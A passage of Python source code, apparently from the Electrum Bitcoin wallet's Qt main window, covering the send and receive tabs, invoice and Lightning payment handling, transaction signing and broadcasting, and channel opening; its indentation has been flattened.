.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
# x is in sats
return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
# amount is in sats
text = self.config.format_amount_and_units(amount)
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('New Address'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except MultipleSpendMaxTxOutputs as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
def task():
coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
return fut.result()
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_bal = sum(self.wallet.get_frozen_balance())
if frozen_bal:
text += " ({} {} {})".format(
self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen")
)
return text
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not d.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
